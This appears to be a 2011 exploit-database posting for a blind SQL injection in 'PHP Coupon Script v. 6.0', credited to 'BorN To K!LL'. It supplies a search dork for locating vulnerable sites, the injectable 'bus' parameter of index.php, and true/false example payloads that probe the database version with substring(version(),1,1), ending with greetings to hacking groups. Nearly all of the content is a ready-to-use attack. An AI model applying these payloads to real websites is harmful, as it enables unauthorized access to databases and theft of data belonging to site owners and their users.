PHP Coupon Script v. 6.0 (bus) Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Coupon Script v. 6.0 (bus) Blind SQL Injection Vulnerability
# Published : 2011-01-23
# Author : BorN To K!LL
# Previous Title : Simploo CMS 1.7.1 PHP Code Execution
# Next Title : N-13 News 3.4 Remote Admin Add CSRF Exploit

==
[|]Script: PHP Coupon Script
[|]Version: 6.0
[|]Dork: "PHP Coupon Script v. 6.0"
[|]Link: http://www.couponscript.com
==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: SQL@hotmail.co.uk
==
[|]3xploit:
/index.php?page=viewbus&bus=[Blind-Injection]

[|]3xample:
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=4                       // false ,,
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=5                       // true ,,

==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==